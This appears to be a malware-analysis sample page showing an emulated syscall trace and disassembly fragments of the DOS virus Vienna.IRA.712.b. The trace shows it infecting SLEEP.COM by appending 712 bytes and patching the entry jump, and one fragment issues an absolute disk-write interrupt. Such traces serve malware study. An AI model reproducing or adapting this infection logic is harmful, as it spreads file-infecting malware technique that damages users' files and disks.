Sample viewer

vx.netlux.org/Virus.DOS.Vienna.IRA.712.b

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:51:40.143171488Z 48 PC: 12a6b | Get DOS version
2018-12-17T22:51:40.145461576Z 47 PC: 12a78 | Get disk transfer address
2018-12-17T22:51:40.148152113Z 26 PC: 12a8b | Set disk transfer address
2018-12-17T22:51:40.162492752Z 42 PC: 12ab2 | Get date 0x12ab2: ret
0x12ab3: mov dx, 0
0x12ab6: mov ds, word ptr [di + 0x37]
0x12ab9: mov al, 2
0x12abb: mov bx, word ptr [di + 0x63]
0x12abe: mov cx, 1
0x12ac1: int 0x26
0x12ac3: jmp 0x12ac6
0x12ac5: nop
0x12ac6: pop si
0x12ac7: push si
0x12ac8: add si, 0x31
0x12acb: nop
0x12acc: lodsb al, byte ptr [si]
0x12acd: mov cx, 0x8000
0x12ad0: repne scasb al, byte ptr es:[di]
0x12ad2: mov cx, 4
0x12ad5: lodsb al, byte ptr [si]
0x12ad6: scasb al, byte ptr es:[di]
0x12ad7: jne 0x12ac6
2018-12-17T22:51:40.166114987Z 78 PC: 12b49 | Find first file
2018-12-17T22:51:40.173054664Z 67 PC: 12b89 | Get or set file attributes
2018-12-17T22:51:40.194728591Z 67 PC: 12b9c | Get or set file attributes
2018-12-17T22:51:40.212901188Z 61 PC: 12ba8 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:51:40.220861935Z 87 PC: 12bb5 | Get or set file date and time
2018-12-17T22:51:40.222932172Z 44 PC: 12bc2 | Get time 0x12bc2: and dh, 7
0x12bc5: jmp 0x12bc8
0x12bc7: nop
0x12bc8: mov ah, 0x3f
0x12bca: mov cx, 3
0x12bcd: mov dx, 0x21
0x12bd0: nop
0x12bd1: add dx, si
0x12bd3: nop
0x12bd4: int 0x21
0x12bd6: jb 0x12c2f
0x12bd8: cmp ax, 3
0x12bdb: jne 0x12c2f
0x12bdd: mov ax, 0x4202
0x12be0: mov dx, 0
0x12be3: mov cx, 0
0x12be6: int 0x21
0x12be8: jb 0x12c2f
0x12bea: mov cx, ax
0x12bec: sub ax, 3
2018-12-17T22:51:40.226877241Z 63 PC: 12bd6 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:51:40.235172493Z 66 PC: 12be8 | Move file pointer
2018-12-17T22:51:40.237150546Z 64 PC: 12c0d | Write file or device (Write 712 bytes on handle 5)
2018-12-17T22:51:40.246861895Z 66 PC: 12c1f | Move file pointer
2018-12-17T22:51:40.249466003Z 64 PC: 12c2f | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:51:40.256666159Z 87 PC: 12c43 | Get or set file date and time
2018-12-17T22:51:40.258324349Z 62 PC: 12c48 | Close file
2018-12-17T22:51:40.267631235Z 67 PC: 12c58 | Get or set file attributes
2018-12-17T22:51:40.279088434Z 26 PC: 12c66 | Set disk transfer address